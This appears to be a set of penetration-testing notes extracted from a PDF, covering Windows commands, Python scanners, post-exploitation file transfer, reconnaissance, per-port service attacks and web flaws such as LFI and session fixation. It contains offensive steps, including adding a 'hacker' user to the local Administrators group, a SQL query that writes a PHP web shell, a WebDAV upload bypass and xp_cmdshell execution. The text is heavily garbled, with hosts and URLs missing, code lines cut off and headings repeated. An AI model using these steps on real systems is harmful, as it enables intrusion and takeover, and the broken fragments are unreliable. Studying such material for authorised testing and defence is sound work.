you save it as blabla.bat. And make sure you don't save it as a text file.
A DLL file is a library that is used for one or more program. It is a binary-file but it is not executable
in itself, but it contains code that the executable calls. It is used to modularize the code of a program.
In the windows operating system DLL files are shared among different applications. For example, the
dll Comdlg32 is used to create dialog boxes. So different applications can invoke this library to
easily create a dialog box. This promotes code reuse.
Basics of Windows
So an application may use the standard windows DLL-files, but it may also bring its own DLL-files.
So if one DLL-file is missing for a program a certain module might not work. As most Windows-
users have sometime experienced.
Lib is a bit like DLL, it is a library. But it is not dynamic as DLL. So lib-files are linked on compile-
time. While dll-files are linked in run-time. Since lib-files are compiled into the executable you never
see it (unless you are developing of course). But since DLL-files are dynamically loaded at run-time
they are still around for the user to see.
PowerShell is Windows new shell. It comes by default from Windows 7. But can be downloaded and
installed in earlier versions.
So a command in PowerShell is called cmdlet. The cmdlets are created using a verb and a noun. Like
Get-Command, Get is a verb and Command is a noun. Other verbs can be: remove, set, disable,
install, etc.
To get help on how to use a cmdlet while in PowerShell, the man-page, you do:
get-help echo
get-help get-command
With get-member you can list all the properties and methods of the object that the command returns.
For example:
Get-Command | Get-Member
Get-Process | Get-Member
$testVar = "blabla"
Invoke-WebRequest <uri>
wget <uri>
measure-object -words
get-content fil.txt | measure-object words
Read a file
Count lines of file
(get-content .\file).count
Select specific line in a file (remember that it starts from 0)
(gc .\file.txt)[10]
gc .\file.txt | Select -index 10
List services
Domain information
Get AD Users
Get-ADUser -f {Name -eq 'Karl, Martinez'} -properties *
Resolve DNS
PowerShell Scripting
PowerShell Scripting
Powershell scripting
Variables are declared like this
$test = "something"
Execute scripts
So for security reasons the default policy for executing scripts is Restricted. Here are the different
Restricted: PowerShell won't run any scripts. This is PowerShell's default execution policy.
AllSigned: PowerShell will only run scripts that are signed with a digital signature. If you run a script
signed by a publisher PowerShell hasn't seen before, PowerShell will ask whether you trust the
script's publisher.
RemoteSigned: PowerShell won't run scripts downloaded from the Internet unless they have a digital
signature, but scripts not downloaded from the Internet will run without prompting. If a script has a
digital signature, PowerShell will prompt you before it runs a script from a publisher it hasn't seen
Unrestricted: PowerShell ignores digital signatures but will still prompt you before running a script
downloaded from the Internet.
So if we want to run script myscript.ps1 we have to set the execution-policy. First let's check
what execution-policy we currently have:
set-ExecutionPolicy unrestricted
CMD - Windows commands
The equivalent to the Linux command ; as in
Delete file
Create folder/directory
md folderName
dir /A
type file.txt
grep files
findstr file.txt
netstat -an
List processes
Kill a process
net users
# Add user
net user hacker my_password /add
net localgroup Administrator hacker /add
# Shutdown now
shutdown /s /t 0
# Restart
shutdown /r /t 0
help dir
Mounting - Mapping
If you want to see which drives are mapped/mounted to your file-system you can use any of these
# With powershell
get-psdrive -psprovider filesystem
Using net use we can connect to other shared folder, on other systems. Many windows machines
have a default-share called IPC (Interprocess communication share). It does not contain any files. But
we can usually connect to it without authentication. This is called a null-session. Although the share
does not contain any files it contains a lot of data that is useful for enumeration. The Linux-equivalent
of net use is usually smbclient.
If you want to map a drive from another network to your filesystem you can do that like this:
Here you map the drive to the letter z. If the command is successful you should now be able to access
those files by entering the z drive.
net use z: /del
Scripting With Python
Python Fundamentals
Python Fundamentals
Python fundamentals
my_list = [1,"string",3,4,5]
for item in my_list:
print item
# Append/push to list
Always good to modular your code.
import module1
total = module1.addNumbers(1,2)
print total
Install pip
To install package
Useful Scripts
Useful Scripts
Useful Scripts
Make Request
Sometimes we might want to make a request to a website programmatically. Instead of having to visit
the page in the browser. In Python we can to it the following way.
If you don't have the module requests installed you can install it like this.
import requests
req = requests.get("")
print req.status_code
print req.text
Custom headers
We might receive a 403 error if we don't include a user-agent. Or we might want to send a specific
header. We can do that the following way.
import requests
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "en-US,en;q=0.8,es;q=0.6,sv;q=0.4",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"Cookie": "_gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1
"Host": "",
"If-Modified-Since": "Wed, 03 Aug 2016 20:05:34 GMT",
"If-None-Match": 'W/"57a24e8e-e1f3"',
"Referer": "",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
If you need to add an action, like loggin in or something like that, to your request you do the
import os
os.environ['HTTPS_PROXY'] = '<proxyurl>:<port>'
# if it is burp
# Then you need to add verify=False
requests.get("", headers=headers,verify=False)
Basic banner-grabber
Here is an example of the most basic usage of the socket module. It connects to a port and prints out
the response.
#!/user/bin/env python
# We use the socker() method of the module socket and store it in the variable
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Here we use the connect method of the socket we created. The two arguments a
# The first is the adress the second is the port.
s.connect(("", 22))
s.send("this is my message\r\n")
print s.recv(1024)
If you need to check all 65535 ports this might take some time. If a packet is sent and recieved that
makes it 65535 seconds, it translates into about 18 hours. So to solve that we can run the a function in
Useful Scripts
new threads.
Connecting to SMTP
A crappy script to connect to a smtp-server and if you are allowed to test for users with VRFY it goes
ahead and test for the users that you input from a file.
One very important thing to note here, that had me stuck for quite a while is that you need to send the
query strings in raw-format
import socket
import sys
import time
import re
ips = [
users = ["root"]
for ip in ips:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 25))
banner = s.recv(1024)
print "****************************"
print "Report for " + ip
print banner
s.send('VRFY root \r\n')
answerUsername = s.recv(1024)
answerAsArray = answerUsername.split(" ")
if answerAsArray[0] == "502":
print "VRFY failed"
if answerAsArray[0] == "250":
Useful Scripts
answerUsername = s.recv(1024)
answerUsernameArray = answerUsername.split(" ")
print answerUsernameArray[0]
if answerUsernameArray[0] == "250":
print "Exists: " + username.strip("\n")
else :
print "Does NOT exist: " + username.strip("\n")
if answerAsArray[0] == "252":
print "FAILED - Cannot verify user"
"Some other error or whatever here it is: \n" + answerUsername
Transferring Files
Transferring Files
Transferring Files
This section could easily be put in the post-exploitation section. But I consider this knowledge so
fundamental that I chose to put it here.
Transfering Files on Linux
You can download files using wget like this:
curl -O
Another easy way to transfer files is by using netcat.
If you can't have an interactive shell it might be risky to start listening on a port, since it could be that
the attacking-machine is unable to connect. So you are left hanging and can't do ctr-c because that
will kill your session.
So instead you can connect from the target machine like this.
On attacking machine:
On target machine:
You can of course also do it the risky way, the other way around:
Transfering Files on Linux
Server receiving file:
With php
echo "<?php file_put_contents('nameOfFile', fopen('',
If you have access to a ftp-client to can of course just use that. Remember, if you are uploading
binaries you must use binary mode, otherwise the binary will become corrupted!!!
On some rare machine we do not have access to nc and wget, or curl. But we might have access to
tftp. Some versions of tftp are run interactively, like this:
$ tftp
tftp> get myfile.txt
If you manage to upload a reverse-shell and get access to the machine you might be able to enter
using ssh. Which might give you a better shell and more stability, and all the other features of SSH.
Like transferring files.
So, in the /home/user directory you can find the hidden .ssh files by typing ls -la.
Then you need to do two things.
This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The
one with the _pub is of course your public key. And the other key is your private.
1. Log in.
Now you should be all set to log in using your private key. Like this
# Copy a file:
scp /path/to/source/file.ext username@
# Copy a directory:
scp -r /path/to/source/dir username@
Transfering files on Windows
Most windows machines have a ftp-client included. But we can't use it interactively since that most
likely would kill our shell. So we have get around that. We can however run commands from a file.
So what we want to do is to echo out the commands into a textfile. And then use that as our input to
the ftp-client. Let me demonstrate.
On the compromised machine we echo out the following commands into a file
ftp -v -n -s:ftp.txt
Of course you need to have a ftp-server configured with the user asshat and the password to
Works by default on:
Windows XP
Windows 2003
A TFTP client is installed by default on windows machines up to Windows XP and Windows 2003.
What is good about TFTP is that you can use it non-interactively. Which means less risk of losing
your shell.
Now you can put stuff in /srv/tftp and it will be served. Remember that TFTP used UDP. So if
you run netstat it will not show it as listening.
Transfering files on Windows
So now you can upload and download whatever from the windows-machine like this
If you like to test that the tftp-server is working you can test it from Linux, I don't think it has a non-
interactive way.
GET test.txt
If you want to make sure that the file was uploaded correct you can check in the syslog. Grep for the
IP like this:
Here is a good script to make a wget-clone in VB.
This is how we can download a file using PowerShell. Remember since we only have a non-
interactive shell we cannot start PowerShell.exe, because our shell can't handle that. But we can get
around that by creaing a PowerShell-script and then executing the script:
This is a crazy technique that works on windows 32 bit machines. Basically the idea is to use the
debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them
from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste
it into a file on the compromised machine, and then assemble it with debug.exe.
Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We can use upx to
compress it even more. So let's do that:
upx -9 nc.exe
Now we just copy-past the text into our windows-shell. And it will automatically create a file called
Let's start with some terminology. We often hear the words egress filtering and ingress in connection
to talk about firewalls and routers.
Egress filtering
This basically means that we are filtering outgoing traffic. So egress filtering ensures that malicious,
or just prohibited, traffic is not allowed to leave the network. Of course egress filtering then is the
enemy of the hacker.
General tips and tricks
Base64 encode/decode
import base64
decoded = base64.b64decode("aGVqc2Fu")
print decoded
Default passwords
Recon and Information Gathering Phase
1. Passive information gathering / OSINT This is when you check out stuff like:
Web information
Email Harvesting
Whois enumeration
This is when you start scanning the target with your different tools.
Passive Information Gatherig
Find out who is behind the website.
Most of the info found on netcraft is not unique. It is basic whois info. But one thing is really good, it
lists the different IP-addresses the page has had over the years. This can be a good way to bypass
cloudflare and other services that hide the real IP. Using netcraft we can find the IP that was in use
before they implemented cloudflare.
Another detail that is good to know is the hosting-company or domain-provider. Those details can
be used if we want to try some social-engineering or spear-phishing attack.
Passive Information Gatherig
Find Subdomains
Find Subdomains
Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you
have. Which means bigger possibility of success.
For now this seems to be a very comprehensive list of tools to find subdomains.
Passive Information Gatherig
DNS Basics
DNS Basics
This is the best article I have found about how the DNS-system works. Form the highest to the lowest
Before we begin to look at the specific techniques that exists to find subdomains, lets try to
understand what subdomains are and how they work.
A - records
The A record maps a name to one or more IP addresses, when the IP are known and stable. So that
would be =>
The CNAME record connects a name to another name. An example of that would be:,CNAME,
Another example is. If you have the domains and You can
have point to So anyone visiting
will see the same thing as It will NOT redirect you. Just show you the same
CNAME is quite convenient. Because if you change the A-record. The IP-address, you don't need to
change the other subdomains, like or Since they both point to, which is a A-record and points directly to the IP.
Another note. If points to, that mean that is the
CNAME (Canonical/real/actual Name) of
MX - Mail exchange
Passive Information Gatherig
Passive Information Gatherig
Finding subdomains
Find Subdomains
Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you
have. Which means bigger possibility of success.
For now this seems to be a very comprehensive list of tools to find subdomains.
Some tools find some stuff, other tools other stuff. So your best bet is to use a few of them together.
Don't forget to brute-force recursively!
In order to find subdomains we can use the recon-ng framework. It has the same basic structure as
metasploit. You can learn more about this tool in the tools-section.
show options
All these subdomains will be saved in hosts, which you can access though: show hosts
If some of these subdomains are not given IPs automatically you can just run
use recon/hosts-hosts/resolve
Google Dorks
Passive Information Gatherig
./ -p
Being smart
You also have to look at what kind of system the target has. Some web-apps give their clients their
own subdomains. Like github.
Check out the homepage Often companies brag about their clients. You can use this to guess the
subdomains of some clients.
Reverse DNS-lookup
If you manage to figure out the IP range that the target owns (see section about nmap below). You can
see which machines are online. And then you can run a script to find out the domain-addresses of
those machines. That way you might find something new.
while read p; do
echo $p;
host $p
done <onlyIps.txt
Here are some more tools that can do reverse lookup
Online tools
Passive Information Gatherig
This tool doesn't enumerate subdomains per se. But it hands of a lot of information about domains.
Bypassing CloudFlare
This tool can be used to find old IPs. It could mean that the
If you try to brute force the domains it is a good idea to have a good dictionary. That can be found
Passive Information Gatherig
host -t ns
This can also be done with tools such as dnsrecon and dnsenum.
Identifying People
Identifying People
Identifying People
We want to find out how is connected to the target. That can be site administrator, employees, owner,
mods. Maybe one of the administrators have posted in a forum with their email, or in a newsgroup or
somewhere else. Those posts could contain useful data about the stack or help us devlop a network
diagram. We might also need to use social engineering.
Company Website
This is pretty obvious. Just look around on the website. Or download it. Or spider it with burp and
then search the result.
Make sure to check out the blog. There you might have employees writing blogposts under their
Social Media companyname companyname companyname
You find some documents and then run exiftool on them to see if there is any interesting metadata. filetype:pdf
Email Harvesting
theharvester - I have not had luck with this
Identifying People
Search Engine Discovery
Remember that the world is bigger than google. So test out the other search engines. myword
Find in url
Wild cards
Exclude words
This query searches for pages that used the word bananasplit.
-banana bananasplit
Search Engine Discovery
Cached version
So if a website has been taken down you can still find the cached version, of the last time google
visited the site
Find login-pages on sites that use the ending .bo. For bolivia.
site:bo inurl:admin.php
Here are some more
Identifying Technology Stack
Active Information Gathering
This tool is used to scan a network for live machines.
netdiscover -r
Nikto is a good tool to scan webservers. It is very intrusive.
Port Scanning
Port Scanning
Port Scanning
# Stealthy
nmap -sS 10.11.1.X
# Fast scan
nmap 10.11.1.X -F
Now that you have gathered some IP addresses from your subdomain scanning it is time to scan those
addresses. You just copy-paste those addresses and add them to a file, line by line. Then you can scan
all of them with nmap at the same time. Using the -iL flag.
Okay, so a bit of the basics of Nmap and how it works. When one machine initiate a connection with
another machine using the transmission-control protocol (tcp) it performs what is know as a three-
way handshake. That means:
If machine2 responds with a syn-ack we know that that port is open. This is basically what nmap does
when it scans for a port. If machine1 omits the last ack packet the connection is not made. This can be
a way to make less noise.
This is the default mode for nmap. If you do not add any flags and scan a machine this is the type of
Port Scanning
connection it creates.
"Stealthy" -sS
By adding the -sS flag we are telling nmap to not finalize the three way handshake. It will send a
syn, receive syn-ack (if the port is open), and then terminate the connection. This used to be
considered stealthy before, since it was often not logged. However it should not be considered
stealthy anymore.
In the flag I imagine that the first s stands for scan/scantype and the second S stands for syn.
UDP scan
UDP is after TCP the most common protocol. DNS (53), SNMP (161/162) and DHCP (67/68) are
some common ones. Scanning for it is slow and unreliable.
Not all output works with grepable format. For example NSE does not work with grepable. So you
might want to use xml instead.
# To text-file
-oN nameOfFile
# To grepable format
-oG nameOfFile
# To xml
-oX nameOfFile
You might find that a site has several machines on the same ip-range. You can then use nmap to scan
the whole range.
The -sn flag stops nmap from running port-scans. So it speeds up the process.
So let's say you find that 40 machine exists in that range. We can use grep to output those IP:s.
First let's find the IPs that were online. Ip-range is the output from previous command. You can of
course combine them all.
Port Scanning
Now you can input all those ips to nmap and scan them.
Nmap scripts
This chapter could also be placed in Vulnerability-analysis and Exploitation. Because nmap scripting
is a really versatile tool that can do many things. Here we will focus on it's ability to retrieve
information that can be useful in the process to find vulnerabilities
First locate the nmap scripts. Nmap scripts end in .nse. For Nmap script engine.
locate *.nse
We can do port-scanning with metasploit and nmap. And we can even integrate nmap into metasploit.
This might be a good way to keep your process neat and organized.
You can run db_nmap and all the output will be stored in the metasploit database and available with
You can also import nmap scans. But you must first output it in xml-format with the following flag
Port Scanning
Good practice would be to output the scan-results in xml, grepable and normal format. You do that
Then you can load it into the database with the following command.
db_import /path/to/file.xml
If you for some reason don't have access to nmap you can run metasploits modules that does
use auxiliary/scanner/portscan/
Vulnerability analysis
Vulnerability analysis
Vulnerability analysis
So now you have done your recon and found services and their versions. You have looked in every
corner of the target. Enumerated subdomains, scanned them, browsed through the webpage looking
So, now it is time to see if any of these services contains any vulnerabilities.
Non-HTTP Vulnerabilities
Non-HTTP Vulnerabilities
Common ports\/services and how to use them
This is fucking awesome. if there is any ports here you dont find check out this guide.
Port 21 - FTP
Connect to the ftp-server to enumerate software and version
nc 21
Many ftp-servers allow anonymous users. These might be misconfigured and give too much access,
and it might also be necessary for certain exploits to work. So always try to log in with
If you upload a binary file you have to put the ftp-server in binary mode, otherwise the file will
become corrupted and you will not be able to use it! The same for text-files. Use ascii mode for them!
You just write binary and ascii to switch mode.
Port 22 - SSH
SSH is such an old and fundamental technology so most modern version are quite hardened. You can
find out the version of the SSH either but scanning it with nmap or by connecting with it using nc.
nc 22
Common ports\/services and how to use them
Port 23 - Telnet
Telnet is considered insecure mainly because it does not encrypt its traffic. Also a quick search in
exploit-db will show that there are various RCE-vulnerabilities on different versions. Might be worth
checking out.
Brute force it
Port 25 - SMTP
SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those
messages are then routed to the SMTP-server which communicates the email to another server. The
SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to
query that database for possible email-addresses. Notice that we cannot retrieve any emails from
SMTP. We can only send emails.
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
We can use this service to find out which usernames are in the database. This can be done in the
following way.
nc 25
Here we have managed to identify the user root. But roooooot was rejected.
Telnet is a bit more friendly some times. So always use that too
telnet 25
Common ports\/services and how to use them
The command will look like this. -M for mode. -U for userlist. -t for target
Common ports\/services and how to use them
Port 69 - TFTP
This is a ftp-server but it is using UDP.
Port 80 - HTTP
Info about web-vulnerabilities can be found in the next chapter HTTP - Web
We usually just think of vulnerabilities on the http-interface, the web page, when we think of port 80.
But with .htaccess we are able to password protect certain directories. If that is the case we can
brute force that the following way.
Step 1
Create a directory that you want to password-protect. Create .htaccess tile inside that directory.
Content of .htaccess:
AuthType Basic
AuthName "Password Protected Area"
AuthUserFile /var/www/html/test/.htpasswd
Require valid-user
This will now create a file called .htpasswd with the user: test and the password: admin
If the directory does not display a login-prompt, you might have to change the apache2.conf file. To
<Directory /var/www/html/test>
AllowOverride AuthConfig
Brute force it
Now that we know how this works we can try to brute force it with medusa.
Common ports\/services and how to use them
Port 88 - Kerberos
Kerberos is a protocol that is used for network authentication. Different versions are used by *nix and
Windows. But if you see a machine with port 88 open you can be fairly certain that it is a Windows
Domain Controller.
If you already have a login to a user of that domain you might be able to escalate that privilege.
Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with
rpcbind -p
An attacker could use this to change the time. Which might cause denial of service and all around
nmap --script=msrpc-enum
For linux-users you can log in to the smb-share using smbclient, like this:
smbclient -L
smbclient //
smbclient \\\\\\ipc$ -U john
smbclient //$ -U john
If you don't provide any password, just click enter, the server might show you the different shares and
version of the server. This can be useful information for looking for exploits. There are tons of
exploits for smb.
If you have credentials you can use psexec you easily log in. You can either use the standalone binary
or the metasploit module.
use exploit/windows/smb/psexec
There are several NSE scripts that can be useful, for example:
ls -l /usr/share/nmap/scripts/smb*
nbtscan -r
It can be a bit buggy sometimes so run it several times to make sure it found all users.
Enum4linux can be used to enumerate windows and linux machines with smb-shares.
enum4linux -a
Connect with a null-session. That is, without a user. This only works for older windows servers.
IMAP lets you access email stored on that server. So imagine that you are on a network at work, the
emails you recieve is not stored on your computer but on a specific mail-server. So every time you
look in your inbox your email-client (like outlook) fetches the emails from the mail-server using
IMAP is a lot like pop3. But with IMAP you can access your email from various devices. With pop3
you can only access them from one device.
SNMP protocols 1,2 and 2c does not encrypt its traffic. So it can be intercepted to steal credentials.
SNMP is used to manage devices on a network. It has some funny terminology. For example, instead
of using the word password the word community is used instead. But it is kind of the same thing. A
common community-string/password is public.
You can have read-only access to the snmp.Often just with the community string public.
SNMP stores all teh data in the Management Information Base. The MIB is a database that is
organized as a tree. Different branches contains different information. So one branch can be username
information, and another can be processes running. The "leaf" or the endpoint is the actual data. If
you have read-access to the database you can read through each endpoint in the tree. This can be used
with snmpwalk. It walks through the whole database tree and outputs the content.
This command will output a lot of information. Way to much, and most of it will not be relevant to us
and much we won't understand really. So it is better to request the info that you are interested in. Here
are the locations of the stuff that we are interested in:
With onesixtyone you can test for open ports but also brute force community strings. I have had more
success using onesixtyone than using nmap. So better use both.
There are a few snmp modules in metasploit that you can use. snmp_enum can show you usernames,
services, and other stuff.
You can sometimes access the ldap using a anonymous login, or with other words no session. This
can be useful becasue you might find some valuable data, about users.
When a client connects to the Ldap directory it can use it to query data, or add or remove.
There are also metasploit modules for Windows 2000 SP4 and Windows Xp SP0/SP1
Common ports\/services and how to use them
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable OpenSSL 0.9.8 branch is NOT vulnerable
You can exploit the vulnerability in many different ways. There is a module for it in burp suite, and
metasploit also has a module for it.
use auxiliary/scanner/ssl/openssl_heartbleed
set verbose true
Now you have a flow of random data, some of it might be of interest to you.
Common ports\/services and how to use them
Find version. Test cups-config --version. If this does not work surf to http://localhost:631/printers
and see the CUPS version in the title bar of your browser.
25, 465
Port 1030/1032/1033/1038
I think these are used by the RPC within Windows Domains. I have found no use for them so far. But
they might indicate that the target is part of a Windows domain. Not sure though.
sqsh -S -U sa
Execute commands
# To execute the date command to the following after logging in
xp_cmdshell 'date'
Many o the scanning modules in metasploit requires authentication. But some do not.
Common ports\/services and how to use them
use auxiliary/scanner/mssql/mssql_ping
Brute force.
If the service is on its default port you can run this command to see what the filesystem is sharing
showmount -e
Then you can mount the filesystem to your machine using the following command
Now we can go to /tmp/NFS and check out /etc/passwd, and add and remove files.
This can be used to escalate privileges if it is not correct configured. Check chapter on Linux
Privilege Escalation.
Common ports\/services and how to use them
Username: root
Password: root
ERROR 1130 (HY000): Host '' is not allowed to connect to this MyS
This occurs because mysql is configured so that the root user is only allowed to log in from
This is a reasonable security measure put up to protect the database.
Configuration files
cat /etc/my.cnf
Uploading a shell
Escalating privileges
If mysql is started as root you might have a chance to use it as a way to escalate your privileges.
You might gain access to a shell by uploading a reverse-shell. And then you need to escalate your
privilege. One way to do that is to look into the databse and see what users and passwords that are
available. Maybe someone is resuing a password?
So the first step is to find the login-credencials for the database. Those are usually found in some
configuration-file oon the web-server. For example, in joomla they are found in:
class JConfig {
var $mailfrom = '';
var $fromname = 'testuser';
var $sendmail = '/usr/sbin/sendmail';
var $password = 'myPassowrd1234';
var $sitename = 'test';
var $MetaDesc = 'Joomla! - the dynamic portal engine and content managemen
var $MetaKeys = 'joomla, Joomla';
var $offline_message = 'This site is down for maintenance. Please check ba
This is categorized by microsoft as a RCE vulnerability. But there is no POC for it online. You can
only DOS a machine using this exploit.
Common ports\/services and how to use them
I am not sure how what can be done with this port. But if it is open it is a sign that the machine in
question might be a Domain Controller.
You can use vncviewer to connect to a vnc-service. Vncviewer comes built-in in Kali.
It defaults to port 5900. You do not have to set a username. VNC is run as a specific user, so when
you use VNC it assumes that user. Also note that the password is not the user password on the
machine. If you have dumped and cracked the user password on a machine does not mean you can
use them to log in. To find the VNC password you can use the metasploit/meterpreter post exploit
module that dumps VNC passwords
use post/windows/gather/credentials/vnc
set session X
If you are unable to input ctr-alt-del (kali might interpret it as input for kali).
Try shift-ctr-alt-del
Metasploit scanner
Login scan
use auxiliary/scanner/vnc/vnc_login
set rhosts
use auxiliary/scanner/vnc/vnc_none_auth
Common ports\/services and how to use them
Port 8080
Since this port is used by many different services. They are divided like this.
Tomcat suffers from default passwords. There is even a module in metasploit that enumerates
common tomcat passwords. And another module for exploiting it and giving you a shell.
Port 9389 -
Active Directory Administrative Center is installed by default on Windows Server 2008 R2 and
is available on Windows 7 when you install the Remote Server Administration Tools (RSAT).
Port Knocking
Port Knocking
Port knocking
Port-knocking the a obfuscation-as-security technique. It basically means that after knocking on ports
in a specific sequence a certain port will open automatically. It seems to be more popular in Capture-
the-flag contests than real life networks. But I have included it anyways, since CTF:s are great.
This is a way to hide certain ports, so you don't get unwanted intrusion-intents.
So for example, imagine you access your server through ssh. But you are tired of getting unwanted
bruteforce attempts all day long. You can just have the SSH-port closed and when you knock on
certain ports in a specific order the ssh-port opens up, maybe for a few minutes, or maybe indefinitely
until you close it again.
When you "knock" on a port you are really just sending TCP-packets with SYN-flag to that port. The
closed port will then respond with a ACK/RST. Which basically means that the host has received the
TCP-packet, and it ACKnolwdge it, but responds with a Reset (RST) flag. RST just means that the
port is closed.
So, how do we actually knock? As mentioned before a knock is essentially just sending a packet to a
specific port. I guess there are quite a few ways to do this. But here are three ways.
1. Knock
2. Nmap/bash
nc 4000
nc 5000
nc 6000
nc 8888
Port Knocking
Break it
One way hack a server with port-knocking implemented would be to sniff for packets on the network.
So if you are on the same network and able to make MITM, you can just sniff that traffic and then
find the sequence.
Using port-knocking as a way to secure your service might come with some risk. The biggest risk I
suppose is that if the knock-daemon fails, for whatever reason. You will be shut out of you machine.
There are of course ways to just restart the knock-daemon if it fails. But maybe that daemon fails as
HTTP - Web Vulnerabilities
A great way to see real examples of specific attack you can check like this through
google: clickjacking
Common Web-services
Common Web-services
Common web-services
This is a list of some common web-services. The list is alphabetical.
Cold Fusion
If you have found a cold fusion you are almost certainly struck gold.
Determine version
Version 8
This works for version 8.0.1. So make sure to check the exact version.
use exploit/windows/http/coldfusion_fckeditor
Full of vulnerabilities. The old versions at least.
Common Web-services
Default credentials
root <blank>
pma <blank>
If you find a phpMyAdmin part of a site that does not have any authentication, or you have managed
to bypass the authetication you can use it to upload a shell.
You go to:
From here we can just run a sql-query that creates a php script that works as a shell
# For linux
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
Okay so webdav is old as hell, and not used very often. It is pretty much like ftp. But you go through
http to access it. So if you have webdav installed on a xamp-server you can access it like this:
Then sign in with username and password. The default username and passwords on xamp are:
Username: wampp
Password: xampp
Common Web-services
Then use put and get to upload and download. With this you can of course upload a shell that gives
you better access.
inurl:webdav site:com
If you managed to gain access but is unable to execute code there is a workaround for that! So if
webdav has prohibited the user to upload .asp code, and pl and whatever, we can do this:
upload a file called shell443.txt, which of course is you .asp shell. And then you rename it to
shell443.asp;.jpg. Now you visit the page in the browser and the asp code will run and return your
Webmin is a webgui to interact with the machine.
The password to enter is the same as the passsword for the root user, and other users if they have that
right. There are several vulnerabilites for it. It is run on port 10000.
sudo wpscan -u http://cybear32c.lab
If you hit a 403. That is, the request if forbidden for some reason. Read more here:
It could mean that the server is suspicious because you don't have a proper user-agent in your request,
in wpscan you can solve this by inserting --random-agent. You can of course also define a specific
agent if you want that. But random-agent is pretty convenient.
Session Management
Session Management
Broken Authentication or Session Management
Logout management
Log out in one tab but you stay logged in in another tab.
Click on log out and then go back in your browser, if you enter in the session again that is a
Session management
Session does not die after password reset
This might be an issue if you save the cookie, and then log out. And then inject the cookie into your
request again. If you can enter the session you have an issue. The issue here might be that the cookie
is cleared on the client-side but not on the server-side.
HttpOnly is a optional flag in the Set-Cookie response header. If the flag is set javascript code is not
able to access the cookie. Which might prevent XSS. HttpOnly works if the browser honors that flag
of course. But most browsers today do. You can see this behaviour if you open up the devetools in
your browser and go to storage and look at the cookies. Then you can do
console.log(document.cookie) and it will only print out the cookie that has the HttpOnly
flag set to false.
This is another optional flag for cookies. It is the application server that set it. By setting this flag the
browser will not send the cookie unencrypted.
Session-ID in URL
Session ID:s should never be showed in URLs. The risk is that if you pass the session-id in the URL
and then share the link with someone that person might inherit the session. But if you put the session-
id in the cookie that risk is avoided.
Broken Authentication or Session Management
3. The hacker figures out you have a user on The hacker clicks the reset-password-
link. But does not use it.
4. The hacked person figures out that he is hacked and thus goes to to change his
5. The hacker now clicks on the link and manage to reset the password.
The problem here is that the first reset-link should be blocked once the second is sent.
1. Open burp-suite
2. Login to a website you want to test
3. Intercept the request, anyone will do.
4. Right click on the request in burp-suite and click on "Send to repeater". Now you have saved
that request for later. With the current cookie.
5. Log out from the website
6. Go to the Repeater-tab in burp and click on "Go".
7. Verify that you are redirected to the login.
Session Fixation
Session Fixation
Session Fixation
Session fixation is a pretty small but common vulnerability.
A common way to handle the fact that HTTP is a stateless protocol is you store cookies in the users
browser, and then have that cookie send to the web server on each subsequent request. This way the
web server can know that the user has visited the website before. So when a user logs in to a web
application a cookie for that session is usually created, in order for the web-server to know that the
session is active.
Session fixation happens when the session-identifier (in this case the cookie) is setbefore the user has
authenticated itself (which is usually done with a simple username/password login), and then not
changed when the user authenticates itself.
For example, let's say you want to log in to a web application. When you first visit the site the
following cookie is set:
You then authenticate with your username and password and make a successful login. But the
SessionID-cookie does not change. Then you have a session fixation vulnerability on your hands.
Because this means that if an attacker can set the SessionID-cookie to a value the attacker knows it
will then know the SessionID-cookie once the user actually authenticates.
In GET request - if the session-token is sent in the URL of a GET-request the attacker can simply
send a link which contains the attacker-controlled session-token.
XSS - If the attacker has also found a XSS vulnerability she can use it to set the cookie. This can of
course be mitigated by setting the HttpOnly attribute to the cookie.
META-tag - If the attacker has the ability to inject html-code she can use the META-tag to set the
WAF - Web Application Firewall
Attacking the System
Attacking the System
Here is an example of php-code vulnerable to LFI. As you can see we just pass in the url-parameter
into the require-function without any sanitization. So the user can just add the path to any file.
$file = $_GET['page'];
In this example the user could just enter this string and retrieve the /etc/passwd file.
It is common to add the file-extension through the php-code. Here is how this would look like:
$file = $_GET['page'];
require($file . ".php");
The php is added to the filename, this will mean that we will not be able to find the files we are
looking for. Since the file /etc/passwd.php does not exist. However, if we add the nullbyte to
the end of our attack-string the .php will not be taken into account. So we add %00 to the end of our
This technique is usually called the nullbyte technique since %00 is the nullbyte. The technique only
works in versions below php 5.3. So look out for that.
Another way to deal with this problem is just to add a question mark to your attack-string. This way
the stuff after gets interpreted as a parameter and therefore excluded. Here is an example:
Bypassing php-execution
So if you have an LFI you can easily read .txt-files but not .php files. That is because they get
executed by the webserver, since their file-ending says that it contains code. This can be bypassed by
using a build-in php-filter.
Attacking the System
Here you use a php-filter to convert it all into base64. So in return you get the whole page base64
encoded. Now you only need to decode it. Save the base64-text into a file and then run:
base64 -d savefile.php
If you read files straight in the browser the styling can becomes unbearable. Really difficult to read. A
way around it is to download the files from the terminal. But that won't work if there is a login that is
blocking it. So this is a great workaround:
Sensitive file
Attacking the System
/usr/local/apache/logs/access_ log
